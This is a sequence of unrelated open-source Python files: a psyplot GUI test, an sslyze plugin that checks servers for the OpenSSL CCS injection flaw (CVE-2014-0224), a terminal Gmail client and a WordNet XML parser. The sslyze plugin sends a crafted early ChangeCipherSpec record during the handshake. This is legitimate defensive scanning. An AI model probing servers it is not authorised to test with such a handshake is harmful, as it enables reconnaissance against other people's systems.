        fname = self.get_file('test-t2m-u-v.nc')
        ds = psy.open_dataset(fname)
        self.pc.bt_get_ds.get_from_shell(ds)
        # add data arrays
        QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
        # move rows: dropping row 2 at (0, 0) should move it to the front
        atab = self.pc.array_table
        old = list(atab.arr_names_dict.items())
        atab.selectRow(2)
        atab.dropOn(event)
        resorted = [old[i] for i in [2, 0, 1] + list(range(3, len(old)))]
        self.assertEqual(list(atab.arr_names_dict.items()), resorted,
                         msg="Rows not moved correctly!")
        ds.close()
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
Chilipp/psyplot_gui
|
tests/test_plot_creator.py
|
Python
|
gpl-2.0
| 15,647
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import socket
import types
from xml.etree.ElementTree import Element
from nassl._nassl import WantReadError
from sslyze.plugins import plugin_base
from sslyze.plugins.plugin_base import PluginScanResult
from sslyze.server_connectivity import ServerConnectivityInfo
from tls_parser.alert_protocol import TlsAlertRecord
from tls_parser.application_data_protocol import TlsApplicationDataRecord
from tls_parser.change_cipher_spec_protocol import TlsChangeCipherSpecRecord
from tls_parser.exceptions import NotEnoughData
from tls_parser.handshake_protocol import TlsHandshakeRecord, TlsServerHelloDoneRecord
from tls_parser.parser import TlsRecordParser
from tls_parser.tls_version import TlsVersionEnum
class OpenSslCcsInjectionScanCommand(plugin_base.PluginScanCommand):
    """Test the server(s) for the OpenSSL CCS injection vulnerability (CVE-2014-0224).
    """
    @classmethod
    def get_cli_argument(cls):
        # CLI flag under which this scan command is exposed.
        return 'openssl_ccs'
class OpenSslCcsInjectionPlugin(plugin_base.Plugin):
    """Test the server(s) for the OpenSSL CCS injection vulnerability (CVE-2014-0224).
    """
    @classmethod
    def get_available_commands(cls):
        return [OpenSslCcsInjectionScanCommand]
    def process_task(self, server_info, scan_command):
        # type: (ServerConnectivityInfo, OpenSslCcsInjectionScanCommand) -> OpenSslCcsInjectionScanResult
        """Run the CCS injection check against one server and return the result."""
        ssl_connection = server_info.get_preconfigured_ssl_connection()
        # Replace nassl.sslClient.do_handshake() with a CCS checking SSL handshake so that all the SSLyze options
        # (startTLS, proxy, etc.) still work
        ssl_connection.do_handshake = types.MethodType(do_handshake_with_ccs_injection, ssl_connection)
        is_vulnerable = False
        try:
            # Start the SSL handshake; the patched handshake signals its
            # verdict by raising one of the two exceptions below.
            ssl_connection.connect()
        except VulnerableToCcsInjection:
            # The test was completed and the server is vulnerable
            is_vulnerable = True
        except NotVulnerableToCcsInjection:
            # The test was completed and the server is NOT vulnerable
            pass
        finally:
            ssl_connection.close()
        return OpenSslCcsInjectionScanResult(server_info, scan_command, is_vulnerable)
class VulnerableToCcsInjection(Exception):
    """Exception to raise during the handshake to hijack the flow and test for CCS.

    Raised when the server processed the early CCS payload (vulnerable).
    """
class NotVulnerableToCcsInjection(Exception):
    """Exception to raise during the handshake to hijack the flow and test for CCS.

    Raised when the server rejected the early CCS payload (not vulnerable).
    """
def do_handshake_with_ccs_injection(self):
    """Modified do_handshake() to send a CCS injection payload and return the result.

    Monkey-patched onto an SSLyze SSL connection object (*self* is the
    connection).  Never returns normally on a completed test: raises
    VulnerableToCcsInjection or NotVulnerableToCcsInjection instead.
    """
    try:
        # Start the handshake using nassl - will throw WantReadError right away
        self._ssl.do_handshake()
    except WantReadError:
        # Send the Client Hello
        len_to_read = self._network_bio.pending()
        while len_to_read:
            # Get the data from the SSL engine
            handshake_data_out = self._network_bio.read(len_to_read)
            # Send it to the peer
            self._sock.send(handshake_data_out)
            len_to_read = self._network_bio.pending()
        # Retrieve the server's response - directly read the underlying network socket
        # Retrieve data until we get to the ServerHelloDone
        # The server may send back a ServerHello, an Alert or a CertificateRequest first
        did_receive_hello_done = False
        remaining_bytes = b''
        while not did_receive_hello_done:
            try:
                tls_record, len_consumed = TlsRecordParser.parse_bytes(remaining_bytes)
                remaining_bytes = remaining_bytes[len_consumed::]
            except NotEnoughData:
                # Try to get more data
                raw_ssl_bytes = self._sock.recv(16381)
                if not raw_ssl_bytes:
                    # No data?
                    break
                remaining_bytes = remaining_bytes + raw_ssl_bytes
                continue
            if isinstance(tls_record, TlsServerHelloDoneRecord):
                did_receive_hello_done = True
            elif isinstance(tls_record, TlsHandshakeRecord):
                # Could be a ServerHello, a Certificate or a CertificateRequest if the server requires client auth
                pass
            elif isinstance(tls_record, TlsAlertRecord):
                # Server returned a TLS alert
                break
            else:
                raise ValueError('Unknown record? Type {}'.format(tls_record.header.type))
        if did_receive_hello_done:
            # Send an early CCS record - this should be rejected by the server
            payload = TlsChangeCipherSpecRecord.from_parameters(
                tls_version=TlsVersionEnum[self._ssl_version.name]).to_bytes()
            self._sock.send(payload)
            # Send an early application data record which should be ignored by the server
            app_data_record = TlsApplicationDataRecord.from_parameters(tls_version=TlsVersionEnum[self._ssl_version.name],
                                                                       application_data=b'\x00\x00')
            self._sock.send(app_data_record.to_bytes())
            # Check if an alert was sent back
            while True:
                try:
                    tls_record, len_consumed = TlsRecordParser.parse_bytes(remaining_bytes)
                    remaining_bytes = remaining_bytes[len_consumed::]
                except socket.error:
                    # Server closed the connection after receiving the CCS payload
                    raise NotVulnerableToCcsInjection()
                except NotEnoughData:
                    # Try to get more data
                    raw_ssl_bytes = self._sock.recv(16381)
                    if not raw_ssl_bytes:
                        # No data?
                        raise NotVulnerableToCcsInjection()
                    remaining_bytes = remaining_bytes + raw_ssl_bytes
                    continue
                if isinstance(tls_record, TlsAlertRecord):
                    # Server returned a TLS alert but which one?
                    if tls_record.subprotocol_message.alert_description == 0x14:
                        # BAD_RECORD_MAC: This means that the server actually tried to decrypt our early application data
                        # record instead of ignoring it; server is vulnerable
                        raise VulnerableToCcsInjection()
                    # Any other alert means that the server rejected the early CCS record
                    raise NotVulnerableToCcsInjection()
                else:
                    # Ignore any non-alert record and keep reading.
                    break
    raise NotVulnerableToCcsInjection()
class OpenSslCcsInjectionScanResult(PluginScanResult):
    """The result of running an OpenSslCcsInjectionScanCommand on a specific server.
    Attributes:
        is_vulnerable_to_ccs_injection (bool): True if the server is vulnerable to OpenSSL's CCS injection issue.
    """
    COMMAND_TITLE = 'OpenSSL CCS Injection'
    def __init__(self, server_info, scan_command, is_vulnerable_to_ccs_injection):
        # type: (ServerConnectivityInfo, OpenSslCcsInjectionScanCommand, bool) -> None
        super(OpenSslCcsInjectionScanResult, self).__init__(server_info, scan_command)
        self.is_vulnerable_to_ccs_injection = is_vulnerable_to_ccs_injection
    def as_xml(self):
        """Serialize the result as an XML element tree."""
        xml_result = Element(self.scan_command.get_cli_argument(), title=self.COMMAND_TITLE)
        vulnerable_attr = {'isVulnerable': str(self.is_vulnerable_to_ccs_injection)}
        xml_result.append(Element('openSslCcsInjection', attrib=vulnerable_attr))
        return xml_result
    def as_text(self):
        """Serialize the result as a list of plain-text lines."""
        if self.is_vulnerable_to_ccs_injection:
            ccs_text = 'VULNERABLE - Server is vulnerable to OpenSSL CCS injection'
        else:
            ccs_text = 'OK - Not vulnerable to OpenSSL CCS injection'
        return [self._format_title(self.COMMAND_TITLE),
                self._format_field('', ccs_text)]
|
krount/sslyze
|
sslyze/plugins/openssl_ccs_injection_plugin.py
|
Python
|
gpl-2.0
| 7,894
|
# Vatsal Shah
# ECE-C433 Mini-Project 2
# gmailPy - A terminal gmail client
# Tested on Python 2.7.3
# imapclient is not a part of the standard python library
# install using sudo pip install imapclient
import getpass
from imapclient import IMAPClient
import operator
import email
import optparse
import sys
class gmailPy(object):
    def __init__(self):
        """Set up connection defaults; call login() to actually connect."""
        self.IMAP_SERVER = 'imap.gmail.com'  # gmail IMAP endpoint
        self.ssl = True  # always connect over SSL
        self.myIMAPc = None  # IMAPClient instance, set by login()
        self.response = None  # last raw server response
        self.folders = []  # cached folder names, filled by get_folders()
    def login(self, username, password):
        """Open an SSL IMAP connection to gmail and authenticate."""
        self.myIMAPc = IMAPClient(self.IMAP_SERVER, ssl=self.ssl)
        self.myIMAPc.login(username, password)
# Returns a list of all the folders for a particular account
def get_folders(self):
self.response = self.myIMAPc.list_folders()
for item in self.response:
self.folders.append(item[2].strip('u'))
return self.folders
# Returns the total number of messages in a folder
    def get_mail_count(self, folder='Inbox'):
        """Return the total number of messages in *folder* (read-only select)."""
        self.response = self.myIMAPc.select_folder(folder, True)
        return self.response['EXISTS']
# Method to delete messages based on their size
def delete_bigmail(self, folder='Inbox'):
self.myIMAPc.select_folder(folder, False)
# Gets all the message ids of the messages which are not deleted in the folder
messages = self.myIMAPc.search(['NOT DELETED'])
print "%d messages that aren't deleted" % len(messages)
if len(messages) > 0:
print "You can exit by entering 0 or pressing CTRL+C \n"
else: print "There are no messages in the folder"
# Gets the message sizes for all the message ids returned in previous step
# Note: Just sends one request for all message ids with a return time < 10 ms
self.response = self.myIMAPc.fetch(messages, ['RFC822.SIZE'])
# Sorts the dictionary returned by fetch by size in descending order
sorted_response = sorted(self.response.iteritems(), key=operator.itemgetter(1), reverse=True)
count = 1
try:
for item in sorted_response:
# Gets the biggest message including headers, body, etc.
big_message = self.myIMAPc.fetch(item[0], ['RFC822'])
for msgid, data in big_message.iteritems():
msg_string = data['RFC822']
# Parses the message string using email library
msg = email.message_from_string(msg_string)
val = dict(self.response[msgid])['RFC822.SIZE']
print 'ID %d: From: %s Date: %s' % (msgid, msg['From'], msg['date'])
print 'To: %s' % (msg['To'])
print 'Subject: %s' % (msg['Subject'])
print 'Size: %d bytes \n' % (val)
user_del = raw_input("Do you want to delete this message?(Y/N): ")
if user_del == 'Y':
self.delete_message(msgid)
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
elif user_del == '0':
print "Program exiting"
sys.exit()
else:
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
count += 1
except KeyboardInterrupt:
print "Program exiting"
sys.exit()
# Method to delete messages based on their size with a search criteria
def delete_bigmail_search(self, folder='Inbox', command='', criteria=''):
self.myIMAPc.select_folder(folder, False)
# Gets all the message ids from the server based on the search criteria
messages = self.myIMAPc.search('%s "%s"' % (command, criteria))
print "%d messages that match --> %s: %s" % (len(messages), command, criteria)
if len(messages) > 0:
print "You can exit by entering 0 or pressing CTRL+C \n"
else: print "There are no messages in that matched your search criteria"
# Gets the message sizes for all the message ids returned in previous step
# Note: Just sends one request for all message ids with a return time < 10 ms
self.response = self.myIMAPc.fetch(messages, ['RFC822.SIZE'])
# Sorts the messages in decending order of their sizes
sorted_response = sorted(self.response.iteritems(), key=operator.itemgetter(1), reverse=True)
count = 1
try:
for item in sorted_response:
# Gets the entire content for the biggest message identified
big_message = self.myIMAPc.fetch(item[0], ['RFC822'])
for msgid, data in big_message.iteritems():
msg_string = data['RFC822']
msg = email.message_from_string(msg_string)
val = dict(self.response[msgid])['RFC822.SIZE']
print 'ID %d: From: %s Date: %s' % (msgid, msg['From'], msg['date'])
print 'To: %s' % (msg['To'])
print 'Subject: %s' % (msg['Subject'])
print 'Size: %d bytes \n' % (val)
user_del = raw_input("Do you want to delete this message?(Y/N): ")
if user_del == 'Y':
self.delete_message(msgid)
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
elif user_del == '0':
print "Program exiting"
sys.exit()
else:
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
count += 1
except KeyboardInterrupt:
print "Program exiting"
sys.exit()
# Deletes a message in the current folder based on msg id
def delete_message(self, id):
try:
self.myIMAPc.delete_messages([id])
self.myIMAPc.expunge()
print "Message deleted"
except IMAPClient.Error as err:
print "Message deletion failed"
print err
# Renames a folder
def rename_folder(self, oldfolder, newfolder):
try:
self.myIMAPc.rename_folder(oldfolder, newfolder)
print "Folder %s renamed to %s" % (oldfolder, newfolder)
except IMAPClient.Error as err:
print "Folder renaming failed"
print err
# Creates a new folder
def create_folder(self, folder):
try:
self.myIMAPc.create_folder(folder)
print "New folder %s created" % folder
except IMAPClient.Error as err:
print "Folder creation failed"
print err
# Deletes a folder
def delete_folder(self, folder):
try:
self.myIMAPc.delete_folder(folder)
print "Folder %s deleted" % folder
except IMAPClient.Error as err:
print "Folder deletion failed"
print err
# Creates a new folder and copies the content from the two folders that need to be merged
# Then deletes the old folders
def merge_folders(self, merged_folder, folder_1, folder_2):
try:
self.create_folder(merged_folder)
# Selects the folder with read/write permission
self.myIMAPc.select_folder(folder_1, True)
messages = self.myIMAPc.search(['NOT DELETED'])
print "Moving %d messages from %s to %s" % (len(messages), folder_1, merged_folder)
self.myIMAPc.copy(messages, merged_folder)
self.myIMAPc.select_folder(folder_2, True)
messages = self.myIMAPc.search(['NOT DELETED'])
print "Moving %d messages from %s to %s" % (len(messages), folder_2, merged_folder)
self.myIMAPc.copy(messages, merged_folder)
print "Deleting %s and %s..." % (folder_1, folder_2)
self.delete_folder(folder_1)
self.delete_folder(folder_2)
print "Merge folder operation succeeded"
except IMAPClient.Error as err:
print "Merge operation failed"
print err
def logout(self):
self.myIMAPc.logout()
def main():
    """Command-line entry point: parse options, prompt for credentials, dispatch."""
    # Using parser library for handling command line arguments
    usage = "usage: python gmailPy.py [options]"
    prog_desc = """gmailPy is a scalable command line gmail client capable of adding, deleting, renaming and merging folders. It also provides interface for the user to delete big messages based on size and search criteria."""
    parser = optparse.OptionParser(usage=usage, description=prog_desc)
    parser.add_option(
        '-l', '--list', help="List folder statistics. This doesn't need any arguments. Usage: python gmailPy.py -l", dest='lf',
        default=False, action='store_true')
    parser.add_option(
        '-b', '--big', help='Delete big messages. Please enter folder name as an argument. For example: python gmailPy.py -b INBOX',
        dest='big_folder_name', action='store')
    parser.add_option(
        '-s', '--bigsearch', help='Delete big messages based on search criteria. This takes 3 arguments folder_name, command and criteria. For example: python gmailPy.py -s INBOX FROM xyz@gmail.com',
        dest='bigsearch_folder_name', action='store', nargs=3)
    parser.add_option(
        '-n', '--new', help='Create new folder. Please enter folder name as an argument. For example: python gmailPy.py -n Test_folder',
        dest='new_folder_name', action='store')
    parser.add_option(
        '-d', '--del', help='Delete a folder. Please enter folder name as an argument. For example: python gmailPy.py -d Test_folder',
        dest='del_folder_name', action='store')
    parser.add_option(
        '-r', '--rename', help='Rename a folder. Please enter old_folder_name and new_folder_name as two arguments. For example: python gmailPy.py -r OLDFOLDERNAME NEWFOLDERNAME',
        dest='rename_folder_name', action='store', nargs=2)
    parser.add_option(
        '-m', '--merge', help='Merge two folders. This takes 3 arguments merged_folder_name , folder_1_name , folder_2_name. For example: python gmailPy.py -m Test_folder_2 Test_folder_0 Test_folder_1',
        dest='merge_folder_name', action='store', nargs=3)
    (opts, args) = parser.parse_args()
    try:
        print "***** Welcome to gmailPy!!! A command line GMAIL Client *****"
        print "Please enter your username and password >>>>>>"
        username = raw_input("Username: ")
        password = getpass.getpass()
        ## Can be set for testing and debugging
        # username = 'username'
        # password = 'password'
        client_session = gmailPy()
        client_session.login(username, password)
        if opts.lf:
            client_folders = client_session.get_folders()
            print "########## Your folder Statistics ##########"
            for item in client_folders:
                try:
                    print item, ':', client_session.get_mail_count(item), 'messages'
                except:
                    # Some folders (e.g. \Noselect) cannot be selected; skip them.
                    pass
            print "############################################"
        if opts.big_folder_name != None:
            print "Let's enter your %s folder and delete big mail" % opts.big_folder_name
            client_session.delete_bigmail(opts.big_folder_name)
        # Only these IMAP search commands are accepted for -s.
        available_commands = ['TO', 'FROM', 'SUBJECT']
        if opts.bigsearch_folder_name != None:
            if opts.bigsearch_folder_name[1] in available_commands:
                print "Let's enter your %s folder and delete big mail with %s: %s" % (opts.bigsearch_folder_name[0], opts.bigsearch_folder_name[1], opts.bigsearch_folder_name[2])
                client_session.delete_bigmail_search(
                    opts.bigsearch_folder_name[0], opts.bigsearch_folder_name[1], opts.bigsearch_folder_name[2])
            else:
                print "Invalid Command Entry. Please enter one of the follwing commands: ", available_commands
        if opts.new_folder_name != None:
            print "Creating a new folder with name %s ..." % opts.new_folder_name
            client_session.create_folder(opts.new_folder_name)
        if opts.del_folder_name != None:
            print "Deleting %s folder..." % opts.del_folder_name
            client_session.delete_folder(opts.del_folder_name)
        if opts.rename_folder_name != None:
            print "Renaming folder %s to %s..." % (opts.rename_folder_name[0], opts.rename_folder_name[1])
            client_session.rename_folder(opts.rename_folder_name[0], opts.rename_folder_name[1])
        if opts.merge_folder_name != None:
            print "Merging folders %s and %s to %s..." % (opts.merge_folder_name[1], opts.merge_folder_name[2], opts.merge_folder_name[0])
            client_session.merge_folders(opts.merge_folder_name[0], opts.merge_folder_name[1], opts.merge_folder_name[2])
        client_session.logout()
    except IMAPClient.Error as err:
        print "Something awful happened"
        print err
    except KeyboardInterrupt:
        # NOTE(review): client_session is unbound if the interrupt arrives
        # before login; this would raise NameError here.
        print "gmailPy force shutdown"
        client_session.logout()
# Script entry point.
if __name__ == '__main__':
    main()
|
hornedbull/gmailPy
|
gmailPy.py
|
Python
|
gpl-2.0
| 13,792
|
#!/usr/bin/env python3
# -*- coding: utf-8, vim: expandtab:ts=4 -*-
import sys
import xml.sax
import synset
DEBUG = False
class WNXMLParserException(Exception):
    """Raised for any error encountered while parsing WNXML input."""

    def __init__(self, message):
        # Keep the original message object; __str__ renders its repr.
        self.message = message

    def __str__(self):
        return "{0!r}".format(self.message)
class WNXMLParserErrorHandler(xml.sax.ErrorHandler):
    """SAX error handler: warnings go to stderr, errors become exceptions."""

    def warning(self, msg):
        # Non-fatal; report and keep parsing.
        sys.stderr.write("SAX parser warning: {0}\n".format(msg))

    def error(self, msg):
        raise WNXMLParserException("SAX parser error: {0}".format(msg))

    def fatal(self, msg):
        raise WNXMLParserException("SAX parser fatal error: {0}".format(msg))
class WNXMLParserContentHandler(xml.sax.ContentHandler):
    """SAX content handler that builds synset.Synset objects from WNXML input.

    Use parse() as the entry point; it returns a list of (Synset, line_number)
    tuples, one per <SYNSET> element encountered.
    """

    def __init__(self):
        xml.sax.ContentHandler.__init__(self)
        self.m_lcnt = 0    # input line number of the current <SYNSET> start tag
        self.m_ppath = []  # XML path to the current node (names of the ancestors)
        self.m_done = -1   # -1: not started synset yet, 0: inside synset, 1: done with synset
        self.m_syns = synset.Synset()  # synset currently being filled
        self.m_syns_list = []          # finished (Synset, line number) pairs
        # Temporary accumulators for (target, type) pairs gathered from nested tags
        self.m_ilrs0_temp = ""
        self.m_ilrs1_temp = ""
        self.m_sumolinks0_temp = ""
        self.m_sumolinks1_temp = ""
        self.m_elrs0_temp = ""
        self.m_elrs1_temp = ""
        self.m_elrs30_temp = ""
        self.m_elrs31_temp = ""
        self.m_ekszlinks0_temp = ""
        self.m_ekszlinks1_temp = ""
        self.m_vframelinks0_temp = ""
        self.m_vframelinks1_temp = ""
        self.m_startroot = False  # was there a starting root tag?
        self.m_endroot = False    # was there an end root tag?

    def endDocument(self):
        """Fail if the input ended in the middle of (or before any) synset."""
        if self.m_done != 1:  # reached eof before end of segment
            raise WNXMLParserException("Warning: end of file reached before </SYNSET>, possibly corrupt input")

    def startElement(self, name, attrs):
        if DEBUG:
            print("({0}, {1}): /{2}/START: {3}".format(self._locator.getLineNumber(),
                                                       self._locator.getColumnNumber(),
                                                       "/".join(self.m_ppath),
                                                       name))
        self.m_ppath.append(name)
        parent = self.m_ppath[-2] if len(self.m_ppath) >= 2 else ""
        gparent = self.m_ppath[-3] if len(self.m_ppath) >= 3 else ""
        # VisDic XML format fault tolerance (no root tag)
        if name == "WNXML":
            self.m_startroot = True
        elif name == "SYNSET":
            if self.m_done == 0:
                raise WNXMLParserException("WNXMLParser internal error: SYNSET should start now, but m_done is not 0 ({0})!".format(self.m_done))
            self.m_done = 0
            self.m_lcnt = self._locator.getLineNumber()
        elif name == "LITERAL" and parent == "SYNONYM" and gparent == "SYNSET":
            self.m_syns.synonyms.append(synset.Synonym("", ""))
        # For the pair-valued links, reset both halves of the accumulator.
        elif name == "ILR" and parent == "SYNSET":
            self.m_ilrs0_temp = ""
            self.m_ilrs1_temp = ""
        elif name == "SUMO" and parent == "SYNSET":
            self.m_sumolinks0_temp = ""
            self.m_sumolinks1_temp = ""
        elif name == "ELR" and parent == "SYNSET":
            self.m_elrs0_temp = ""
            self.m_elrs1_temp = ""
        elif name == "ELR3" and parent == "SYNSET":
            self.m_elrs30_temp = ""
            self.m_elrs31_temp = ""
        elif name == "EKSZ" and parent == "SYNSET":
            self.m_ekszlinks0_temp = ""
            self.m_ekszlinks1_temp = ""
        elif name == "VFRAME" and parent == "SYNSET":
            self.m_vframelinks0_temp = ""
            self.m_vframelinks1_temp = ""
        elif name == "USAGE" and parent == "SYNSET":
            self.m_syns.usages.append("")
        elif name == "SNOTE" and parent == "SYNSET":
            self.m_syns.snotes.append("")
        # EQ_* links carry a fixed type; the target is filled in characters().
        elif name == "EQ_NEAR_SYNONYM" and parent == "SYNSET":
            self.m_syns.elrs.append(["", "eq_near_synonym"])
        elif name == "EQ_HYPERNYM" and parent == "SYNSET":
            self.m_syns.elrs.append(["", "eq_has_hypernym"])
        elif name == "EQ_HYPONYM" and parent == "SYNSET":
            self.m_syns.elrs.append(["", "eq_has_hyponym"])
        # BUG FIX: duplicate EKSZ/VFRAME branches that appended ["", ""] to
        # ekszlinks/vframelinks were removed here -- they were unreachable
        # because the identical conditions above always matched first.

    def characters(self, chrs):
        if DEBUG:
            print("({0}, {1}): /{2}/#PCDATA: {3}".format(self._locator.getLineNumber(),
                                                         self._locator.getColumnNumber(),
                                                         "/".join(self.m_ppath),
                                                         chrs))
        # Ignore text outside of a synset.
        if self.m_done == 1 or self.m_done == -1:
            return
        self.m_ppath.append("#PCDATA")
        parent = self.m_ppath[-2] if len(self.m_ppath) >= 2 else ""
        gparent = self.m_ppath[-3] if len(self.m_ppath) >= 3 else ""
        ggparent = self.m_ppath[-4] if len(self.m_ppath) >= 4 else ""
        # Text may arrive in several chunks, hence the += everywhere.
        if parent == "ID" and gparent == "SYNSET":  # SYNSET/ID
            self.m_syns.wnid += chrs
        elif parent == "ID3" and gparent == "SYNSET":  # SYNSET/ID3
            self.m_syns.wnid3 += chrs
        elif parent == "POS" and gparent == "SYNSET":  # SYNSET/POS
            self.m_syns.pos += chrs
        elif parent == "LITERAL" and gparent == "SYNONYM":  # SYNSET/SYNONYM/LITERAL
            if len(self.m_syns.synonyms) == 0:
                raise WNXMLParserException("WNXMLParser internal error: synonyms empty at LITERAL tag")
            self.m_syns.synonyms[-1].literal += chrs
        elif parent == "SENSE" and gparent == "LITERAL" and ggparent == "SYNONYM":  # SYNSET/SYNONYM/LITERAL/SENSE
            if len(self.m_syns.synonyms) == 0:
                raise WNXMLParserException("WNXMLParser internal error: synonyms empty at SENSE tag")
            self.m_syns.synonyms[-1].sense += chrs
        elif parent == "LNOTE" and gparent == "LITERAL" and ggparent == "SYNONYM":  # SYNSET/SYNONYM/LITERAL/LNOTE
            if len(self.m_syns.synonyms) == 0:
                raise WNXMLParserException("WNXMLParser internal error: synonyms empty({0}) at LNOTE tag".format(len(self.m_syns.synonyms)))
            self.m_syns.synonyms[-1].lnote += chrs
        elif parent == "NUCLEUS" and gparent == "LITERAL" and ggparent == "SYNONYM":  # SYNSET/SYNONYM/LITERAL/NUCLEUS
            if len(self.m_syns.synonyms) == 0:
                raise WNXMLParserException("WNXMLParser internal error: synonyms empty at NUCLEUS tag")
            self.m_syns.synonyms[-1].nucleus += chrs
        elif parent == "DEF" and gparent == "SYNSET":  # SYNSET/DEF
            self.m_syns.definition += chrs
        elif parent == "BCS" and gparent == "SYNSET":  # SYNSET/BCS
            self.m_syns.bcs += chrs
        elif parent == "USAGE" and gparent == "SYNSET":  # SYNSET/USAGE
            if len(self.m_syns.usages) == 0:
                raise WNXMLParserException("WNXMLParser internal error: usages empty at USAGE tag")
            self.m_syns.usages[-1] += chrs
        elif parent == "SNOTE" and gparent == "SYNSET":  # SYNSET/SNOTE
            if len(self.m_syns.snotes) == 0:
                raise WNXMLParserException("WNXMLParser internal error: snotes empty at SNOTE tag")
            self.m_syns.snotes[-1] += chrs
        elif parent == "STAMP" and gparent == "SYNSET":  # SYNSET/STAMP
            self.m_syns.stamp += chrs
        elif parent == "DOMAIN" and gparent == "SYNSET":  # SYNSET/DOMAIN
            self.m_syns.domain += chrs
        elif parent == "NL" and gparent == "SYNSET":  # SYNSET/NL
            self.m_syns.nl += chrs
        elif parent == "TNL" and gparent == "SYNSET":  # SYNSET/TNL
            self.m_syns.tnl += chrs
        elif parent == "ILR" and gparent == "SYNSET":  # SYNSET/ILR
            self.m_ilrs0_temp += chrs
        elif parent == "TYPE" and gparent == "ILR":  # SYNSET/ILR/TYPE
            self.m_ilrs1_temp += chrs
        elif parent == "SUMO" and gparent == "SYNSET":  # SYNSET/SUMO
            self.m_sumolinks0_temp += chrs
        elif parent == "TYPE" and gparent == "SUMO":  # SYNSET/SUMO/TYPE
            self.m_sumolinks1_temp += chrs
        # NOTE(review): for EQ_* the target text goes into m_elrs0_temp, but no
        # endElement branch merges it into the ["", type] entry appended in
        # startElement -- confirm against upstream pywnxml whether EQ_* targets
        # are expected in the input format at all.
        elif parent == "EQ_NEAR_SYNONYM" and gparent == "SYNSET":  # SYNSET/EQ_NEAR_SYNONYM
            self.m_elrs0_temp += chrs
        elif parent == "EQ_HYPERNYM" and gparent == "SYNSET":  # SYNSET/EQ_HYPERNYM
            self.m_elrs0_temp += chrs
        elif parent == "EQ_HYPONYM" and gparent == "SYNSET":  # SYNSET/EQ_HYPONYM
            self.m_elrs0_temp += chrs
        elif parent == "ELR" and gparent == "SYNSET":  # SYNSET/ELR
            self.m_elrs0_temp += chrs
        elif parent == "TYPE" and gparent == "ELR":  # SYNSET/ELR/TYPE
            self.m_elrs1_temp += chrs
        elif parent == "ELR3" and gparent == "SYNSET":  # SYNSET/ELR3
            self.m_elrs30_temp += chrs
        elif parent == "TYPE" and gparent == "ELR3":  # SYNSET/ELR3/TYPE
            self.m_elrs31_temp += chrs
        elif parent == "EKSZ" and gparent == "SYNSET":  # SYNSET/EKSZ
            self.m_ekszlinks0_temp += chrs
        elif parent == "TYPE" and gparent == "EKSZ":  # SYNSET/EKSZ/TYPE
            self.m_ekszlinks1_temp += chrs
        elif parent == "VFRAME" and gparent == "SYNSET":  # SYNSET/VFRAME
            self.m_vframelinks0_temp += chrs
        elif parent == "TYPE" and gparent == "VFRAME":  # SYNSET/VFRAME/TYPE
            self.m_vframelinks1_temp += chrs
        self.m_ppath.pop()

    def endElement(self, name):
        if DEBUG:
            print("({0}, {1}): /{2}/END: {3}".format(self._locator.getLineNumber(),
                                                     self._locator.getColumnNumber(),
                                                     "/".join(self.m_ppath),
                                                     name))
        parent = self.m_ppath[-2] if len(self.m_ppath) >= 2 else ""
        if name == "WNXML":  # WNXML
            self.m_endroot = True
        elif name == "SYNSET":  # SYNSET
            if self.m_done != 0:
                raise WNXMLParserException("This is impossible!\nThe parser should've caught this error: 'SYNSET' end tag without previous begin tag")
            self.m_done = 1
            self.m_syns_list.append((self.m_syns, self.m_lcnt))
            self.m_syns = synset.Synset()  # start a fresh synset for the next element
        elif name == "ILR" and parent == "SYNSET":
            self.m_syns.ilrs.append((self.m_ilrs0_temp, self.m_ilrs1_temp))
            self.m_ilrs0_temp = ""
            self.m_ilrs1_temp = ""
        elif name == "SUMO" and parent == "SYNSET":
            self.m_syns.sumolinks.append((self.m_sumolinks0_temp, self.m_sumolinks1_temp))
            self.m_sumolinks0_temp = ""
            self.m_sumolinks1_temp = ""
        elif name == "ELR" and parent == "SYNSET":
            self.m_syns.elrs.append((self.m_elrs0_temp, self.m_elrs1_temp))
            self.m_elrs0_temp = ""
            # BUG FIX: originally m_elrs0_temp was reset twice and m_elrs1_temp
            # never, so a following ELR without a TYPE inherited the stale type.
            self.m_elrs1_temp = ""
        elif name == "ELR3" and parent == "SYNSET":
            self.m_syns.elrs3.append((self.m_elrs30_temp, self.m_elrs31_temp))
            self.m_elrs30_temp = ""
            # BUG FIX: same stale-reset problem as ELR above.
            self.m_elrs31_temp = ""
        elif name == "EKSZ" and parent == "SYNSET":
            self.m_syns.ekszlinks.append((self.m_ekszlinks0_temp, self.m_ekszlinks1_temp))
            self.m_ekszlinks0_temp = ""
            self.m_ekszlinks1_temp = ""
        elif name == "VFRAME" and parent == "SYNSET":
            self.m_syns.vframelinks.append((self.m_vframelinks0_temp, self.m_vframelinks1_temp))
            self.m_vframelinks0_temp = ""
            self.m_vframelinks1_temp = ""
        self.m_ppath.pop()

    # Magic lies here
    # Source: http://stackoverflow.com/a/12263340
    def parse(self, input_file):
        """Parse input_file (path or file object) and return the synset list."""
        # Make parser
        xmlReader = xml.sax.make_parser()
        # set self as ContentHandler
        xmlReader.setContentHandler(self)
        # Set ErrorHandler
        xmlReader.setErrorHandler(WNXMLParserErrorHandler())
        # Do the actual parsing
        xmlReader.parse(input_file)
        # Return the gathered result
        return self.m_syns_list
|
ppke-nlpg/pywnxml
|
WNXMLParser.py
|
Python
|
gpl-2.0
| 12,898
|
#! /usr/bin/env python
# -*- coding: iso-8859-1 -*-
# chimera - observatory automation system
# Copyright (C) 2006-2007 P. Henrique Silva <henrique@astro.ufsc.br>
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from chimera.core.metaobject import MetaObject
